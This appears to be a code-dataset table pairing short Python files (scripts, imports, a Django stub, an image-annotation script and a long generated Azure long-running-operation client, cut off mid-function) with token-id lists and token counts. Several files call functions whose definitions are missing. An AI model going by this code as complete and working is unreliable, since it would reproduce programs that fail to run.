content stringlengths 1 1.04M | input_ids listlengths 1 774k | ratio_char_token float64 0.38 22.9 | token_count int64 1 774k |
|---|---|---|---|
from . import utility, data
| [
6738,
764,
1330,
10361,
11,
1366,
628
] | 4.142857 | 7 |
from typing import List, Optional
if __name__ == "__main__":
frequency_changes = read_input("input.txt")
duplicate = find_duplicate(frequency_changes)
if duplicate is not None:
print(f"First frequency repeated: {duplicate}")
| [
6738,
19720,
1330,
7343,
11,
32233,
628,
628,
198,
361,
11593,
3672,
834,
6624,
366,
834,
12417,
834,
1298,
198,
220,
220,
220,
8373,
62,
36653,
796,
1100,
62,
15414,
7203,
15414,
13,
14116,
4943,
198,
220,
220,
220,
23418,
796,
1064,... | 2.964286 | 84 |
# organize links files and try to download it again
with open ('links.txt', 'r') as f:
links = f.read()
links = links.split('.pdf')
links = [l + '.pdf' for l in links]
for l in links:
import downloadall as down
down.download_pdf(l, "extra")
| [
2,
16481,
6117,
3696,
290,
1949,
284,
4321,
340,
757,
198,
198,
4480,
1280,
19203,
28751,
13,
14116,
3256,
705,
81,
11537,
355,
277,
25,
198,
197,
28751,
796,
277,
13,
961,
3419,
198,
198,
28751,
796,
6117,
13,
35312,
7,
4458,
12315... | 2.862069 | 87 |
import uuid
from django.db import models
# Create your models here.
| [
11748,
334,
27112,
198,
6738,
42625,
14208,
13,
9945,
1330,
4981,
198,
198,
2,
13610,
534,
4981,
994,
13,
628,
628
] | 3.428571 | 21 |
from __future__ import absolute_import
from .ec2 import EC2System
from .google import GoogleCloudSystem
from .hawkular import HawkularSystem
from .lenovo import LenovoSystem
from .msazure import AzureSystem
from .nuage import NuageSystem
from .openstack import OpenstackSystem
from .openstack_infra import OpenstackInfraSystem
from .redfish import RedfishSystem
from .rhevm import RHEVMSystem
from .scvmm import SCVMMSystem
from .vcloud import VmwareCloudSystem
from .virtualcenter import VMWareSystem
__all__ = [
'EC2System', 'GoogleCloudSystem', 'HawkularSystem', 'LenovoSystem',
'AzureSystem', 'NuageSystem', 'OpenstackSystem', 'OpenstackInfraSystem', 'RedfishSystem',
'RHEVMSystem', 'SCVMMSystem', 'VmwareCloudSystem', 'VMWareSystem'
]
| [
6738,
11593,
37443,
834,
1330,
4112,
62,
11748,
198,
198,
6738,
764,
721,
17,
1330,
13182,
17,
11964,
198,
6738,
764,
13297,
1330,
3012,
18839,
11964,
198,
6738,
764,
40624,
934,
1330,
26698,
934,
11964,
198,
6738,
764,
11925,
18768,
13... | 3.222222 | 234 |
# -*- coding: utf-8 -*-
"""
"""
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
__author__ = "timmyliang"
__email__ = "820472580@qq.com"
__date__ = "2021-01-30 22:16:52"
import os
import sys
import signal
signal.signal(signal.SIGINT, signal.SIG_DFL)
DIR = os.path.dirname(__file__)
import sys
MODULE = os.path.join(DIR, "..")
if MODULE not in sys.path:
sys.path.insert(0, MODULE)
from QBinder import Binder
from QBinder.hook import MethodHook,FuncHook
from Qt import QtWidgets
import os
import sys
state = Binder()
state.msg = "test"
@FuncHook
if __name__ == "__main__":
main()
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
198,
37811,
198,
198,
6738,
11593,
37443,
834,
1330,
7297,
198,
6738,
11593,
37443,
834,
1330,
3601,
62,
8818,
198,
6738,
11593,
37443,
834,
1330,
4112,
62,
... | 2.541985 | 262 |
import random
import cv2
import numpy as np
import glob
if __name__=='__main__':
img = cv2.imread('img_7.jpg')
annot = load_annot('gt_img_7.txt')
img, annot = process_image(img, annot)
img, conf, xywh = annot_to_grid(img, annot, 16)
annot = grid_to_annot(conf, xywh, 16)
img = draw(img, annot)
cv2.imshow('img',img)
cv2.waitKey(0)
| [
11748,
4738,
198,
11748,
269,
85,
17,
220,
198,
11748,
299,
32152,
355,
45941,
220,
198,
11748,
15095,
220,
198,
198,
361,
11593,
3672,
834,
855,
6,
834,
12417,
834,
10354,
198,
197,
9600,
796,
269,
85,
17,
13,
320,
961,
10786,
9600... | 2.271523 | 151 |
# pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, List, Optional, TypeVar, Union
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from msrest import Serializer
T = TypeVar("T")
JSONType = Any
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
class LROsOperations(object): # pylint: disable=too-many-public-methods
"""LROsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
@distributed_trace
def begin_put200_succeeded(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running put request, service returns a 200 to the initial request, with an entity that
contains ProvisioningState=’Succeeded’.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put200_succeeded_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_patch200_succeeded_ignore_headers(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running put request, service returns a 200 to the initial request with location header. We
should not have any subsequent calls after receiving this first response.
:param product: Product to patch.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._patch200_succeeded_ignore_headers_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_patch201_retry_with_async_header(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running patch request, service returns a 201 to the initial request with async header.
:param product: Product to patch.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200, 201
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._patch201_retry_with_async_header_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, lro_options={"final-state-via": "azure-async-operation"}, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_patch202_retry_with_async_and_location_header(
self, product: JSONType = None, **kwargs: Any
) -> LROPoller[JSONType]:
"""Long running patch request, service returns a 202 to the initial request with async and
location header.
:param product: Product to patch.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200, 202
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._patch202_retry_with_async_and_location_header_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put201_succeeded(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running put request, service returns a 201 to the initial request, with an entity that
contains ProvisioningState=’Succeeded’.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 201
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put201_succeeded_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post202_list(self, **kwargs: Any) -> LROPoller[List[JSONType]]:
"""Long running put request, service returns a 202 with empty body to first request, returns a 200
with body [{ 'id': '100', 'name': 'foo' }].
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns list of JSON object
:rtype: ~azure.core.polling.LROPoller[list[JSONType]]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# response body for status code(s): 200
response.json() == [
{
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
]
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[List[JSONType]]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._post202_list_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put200_succeeded_no_state(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running put request, service returns a 200 to the initial request, with an entity that
does not contain ProvisioningState=’Succeeded’.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put200_succeeded_no_state_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put202_retry200(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running put request, service returns a 202 to the initial request, with a location header
that points to a polling URL that returns a 200 and an entity that doesn't contains
ProvisioningState.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 202
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put202_retry200_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put201_creating_succeeded200(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running put request, service returns a 201 to the initial request, with an entity that
contains ProvisioningState=’Creating’. Polls return this value until the last poll returns a
‘200’ with ProvisioningState=’Succeeded’.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200, 201
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put201_creating_succeeded200_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put200_updating_succeeded204(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running put request, service returns a 201 to the initial request, with an entity that
contains ProvisioningState=’Updating’. Polls return this value until the last poll returns a
‘200’ with ProvisioningState=’Succeeded’.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put200_updating_succeeded204_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
